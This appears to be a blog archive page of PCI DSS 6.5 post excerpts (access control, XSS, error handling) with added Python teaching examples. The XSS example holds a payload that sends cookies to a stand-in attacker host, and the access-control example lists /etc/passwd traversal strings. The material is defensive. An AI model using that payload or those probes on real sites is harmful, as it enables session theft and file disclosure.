PCI Requirement 6.5.8 – Improper Access Control

by Randy Bartels / February 7, 2023

What is Improper Access Control? PCI Requirement 6.5.8 requires that your organization’s applications be protected from improper access control, such as insecure direct object references, failure to restrict URL access, directory traversal, and failure to restrict user access to functions. PCI Requirement 6.5.8 applies to all of your organization’s web applications, internal application interfaces, and external application interfaces. Web applications, the PCI DSS states, have unique security risks as well…
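The three failure modes the excerpt names (insecure direct object reference, directory traversal, unrestricted access to functions) all come down to trusting an identifier or path supplied by the request. The following is an added example, not code from the original post or from the PCI DSS; the invoice store, user roles and directory name are constructed for illustration.

```python
"""Added example: object-level, path-level and function-level access checks.
All data below is constructed; nothing here comes from the original post."""
import os
from dataclasses import dataclass


@dataclass(frozen=True)
class Invoice:
    invoice_id: int
    owner: str
    total: str


# Constructed sample data store and role table.
INVOICES = {
    1001: Invoice(1001, "alice", "42.00"),
    1002: Invoice(1002, "bob", "19.99"),
}
ROLES = {"alice": {"customer"}, "bob": {"customer"}, "carol": {"customer", "admin"}}


class Forbidden(Exception):
    """Raised when the caller is not allowed to reach the requested resource."""


def get_invoice_insecure(invoice_id: int) -> Invoice:
    # Insecure direct object reference: the identifier from the request is the only
    # thing consulted, so any authenticated user can read any invoice by changing it.
    return INVOICES[invoice_id]


def get_invoice(current_user: str, invoice_id: int) -> Invoice:
    inv = INVOICES.get(invoice_id)
    # Deny by default, and make "does not exist" and "belongs to someone else"
    # indistinguishable so the endpoint cannot be used to enumerate valid ids.
    if inv is None or inv.owner != current_user:
        raise Forbidden("invoice not accessible")
    return inv


def resolve_under(base_dir: str, requested: str) -> str:
    # Directory traversal guard: canonicalise both paths, then require that the
    # target lies inside the base. commonpath (not str.startswith) is used so that
    # "reports_old" is not accepted as a child of "reports".
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise Forbidden("path escapes base directory")
    return target


def export_all_invoices(current_user: str) -> list:
    # Failure to restrict access to functions: an admin-only action must check the
    # caller's role server-side, not rely on the link being hidden in the UI.
    if "admin" not in ROLES.get(current_user, set()):
        raise Forbidden("admin role required")
    return list(INVOICES.values())


if __name__ == "__main__":
    print(get_invoice("alice", 1001))
    for bad in ("../../etc/passwd", "/etc/passwd", "../reports_old/x.pdf"):
        try:
            resolve_under("reports", bad)
        except Forbidden as exc:
            print(bad, "->", exc)
```

The ownership check in `get_invoice` is the part most often missing in practice: authentication tells you who the caller is, but every object lookup still has to ask whether that caller may see this particular object.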

PCI Requirement 6.5.7 – Cross-Site Scripting (XSS)

by Randy Bartels / February 7, 2023

What is Cross-Site Scripting? Cross-site scripting (XSS) is another type of common coding vulnerability associated with application development. PCI Requirement 6.5.7 requires that you protect all of your organization’s web applications, internal application interfaces, and external application interfaces from XSS. Web applications, the PCI DSS states, have unique security risks as well as relative ease and occurrence of compromise. How does an XSS attack work? XSS is a type of…
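The excerpt is cut off before it explains the mechanism, so here is the shape of a reflected XSS in working code: untrusted input written straight into markup, beside the same output with context-aware escaping. This is an added example, not code from the original post; the payload and page fragments are constructed.

```python
"""Added example: reflected XSS via string interpolation versus escaping.
The payload and markup are constructed; nothing here is from the original post."""
import html

# Constructed attacker-controlled input, e.g. a search query echoed back to the page.
PAYLOAD = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'


def render_insecure(query: str) -> str:
    # Untrusted data interpolated into the HTML body: the browser parses the
    # payload as markup and runs the script in the victim's session.
    return f"<p>Results for: {query}</p>"


def render_escaped(query: str) -> str:
    # html.escape encodes < > & " and ' so the browser shows the input as text.
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_attribute(value: str) -> str:
    # Attribute context: the attribute is quoted and quotes are escaped, otherwise
    # an input such as  " onmouseover="alert(1)  breaks out of the value.
    return f'<input type="text" name="q" value="{html.escape(value, quote=True)}">'


def contains_live_script(markup: str) -> bool:
    # Crude demo check: does an unescaped <script tag survive into the output?
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_insecure(PAYLOAD))
    print(render_escaped(PAYLOAD))
    print(render_attribute('" onmouseover="alert(1)'))
```

Escaping has to match the context the data lands in (HTML body, attribute, JavaScript string, URL); body escaping alone does not protect an unquoted attribute or an inline script block.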


PCI Requirement 6.5.1 – 6.5.6 Recap

by Randy Bartels / February 7, 2023

Where Do PCI Requirements 6.5.1 – 6.5.6 Apply? We’ve looked at PCI Requirement 6.5.1 through 6.5.6 together and learned about protection from injection flaws, buffer overflows, insecure cryptographic storage, insecure communications, improper error handling, and “high risk” vulnerabilities. But, where does PCI Requirement 6.5.1 through 6.5.6 apply? It’s important to know that PCI Requirements 6.5.1 through 6.5.6 apply to all internal and external applications. PCI Requirements 6.5.1 – 6.5.6 Recap…

PCI Requirement 6.5.5 – Improper Error Handling

by Randy Bartels / February 7, 2023

What is Improper Error Handling? Improper error handling is one of the common coding vulnerabilities outlined in PCI Requirement 6.5. PCI Requirement 6.5.5 states that improper error handling must be addressed in your coding techniques. PCI Requirement 6.5.5 alerts organizations that improper error handling introduces many security issues to your website because it can unintentionally leak information to an end-user or malicious individual. For example, a 500 Internal Server Error…
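To make the leak concrete: a 500 handler that returns the exception text or stack trace can hand an attacker internal hostnames, file paths and even credentials embedded in a driver's error message. Below, as an added example that is not part of the original post, is that handler beside one that keeps the detail in a server-side log keyed by a correlation id. The failing backend, the connection string and the log sink are all constructed.

```python
"""Added example: a 500 handler that leaks internals versus one that returns a
generic response and logs the detail server-side. Everything here is constructed."""
import traceback
import uuid

# Constructed secret that a stack trace or str(exc) would otherwise expose.
DB_URL = "postgresql://app:S3cretPassw0rd@db.internal:5432/cardholder"

# Constructed server-side log sink; a real service would use logging/SIEM shipping.
SERVER_LOG: list = []


class DatabaseError(Exception):
    pass


def query_orders(customer_id: str):
    # Constructed backend that fails the way many drivers do: the exception
    # message carries the connection string it tried to use.
    raise DatabaseError(f"could not connect to {DB_URL}: connection refused")


def handle_insecure(customer_id: str):
    """Returns (status, body). Echoes the traceback to the client."""
    try:
        return 200, str(query_orders(customer_id))
    except Exception:
        # Improper error handling: internal paths, hostnames and credentials go
        # straight to whoever sent the request.
        return 500, "Internal Server Error\n" + traceback.format_exc()


def handle_secure(customer_id: str):
    """Returns (status, body). Client sees only a generic message and a reference id."""
    try:
        return 200, str(query_orders(customer_id))
    except Exception:
        # Full detail stays server-side; the opaque id lets support correlate the
        # client's report with the log record without exposing anything.
        correlation_id = uuid.uuid4().hex
        SERVER_LOG.append(f"{correlation_id} {traceback.format_exc()}")
        return 500, f"Internal Server Error (reference {correlation_id})"


if __name__ == "__main__":
    print(handle_insecure("c1")[1])
    print(handle_secure("c1")[1])
    print(SERVER_LOG[-1])
```

The same discipline applies to framework debug pages and verbose 404/403 responses: anything that varies with internal state is information an attacker can use to map the application.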

PCI Requirement 6.5.6 – All “High Risk” Vulnerabilities

by Randy Bartels / February 7, 2023

What are “High Risk” Vulnerabilities? PCI Requirement 6.1 taught us how to establish a process for identifying security vulnerabilities. The PCI DSS explained that risk ranking allows organizations to identify, prioritize, and address the highest risk items and reduce the likelihood that vulnerabilities will be exploited. Risk ranking is a vital element of PCI Requirement 6.5.6, which states that organizations must have a process in place to determine how to…